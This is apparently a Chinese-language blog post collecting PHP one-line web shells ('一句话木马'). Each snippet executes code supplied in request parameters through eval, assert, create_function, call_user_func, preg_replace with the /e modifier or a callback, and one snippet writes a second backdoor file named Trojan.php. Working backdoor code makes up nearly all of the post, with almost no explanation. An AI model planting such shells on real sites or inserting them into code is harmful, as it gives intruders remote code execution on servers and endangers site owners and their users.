Last updated on August 18, 2025 pm
eval函数
1
2
3
| <?php
@eval($_REQUEST['test']);
?>
|
assert 函数
1
| <?php assert(@$_POST['test']); ?>
|
function
1
2
3
4
5
6
| <?php
function test1($code){
$code($_REQUEST['test']);
}
test1(assert);
?>
|
create_function函数
1
2
3
4
| <?php
$fun = create_function('',$_POST['test']);
$fun();
?>
|
call_user_func函数
1
2
3
| <?php
@call_user_func(assert,$_POST['test']);
?>
|
preg_replace 函数
如果在表达式末尾加上e,则可以执行代码
1
2
3
| <?php
@preg_replace("/abcde/e", $_POST['test'], "abcdefg");
?>
|
file_put_content函数
1
2
3
4
| <?php
$test='<?php $a=$_POST["test"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>
|
回调函数
1
2
3
| <?php
forward_static_call_array(assert,array($_POST[x]));
?>
|
未完待续….
PHP常用一句话木马整理
https://blog.lixey.top/posts/90b3b820/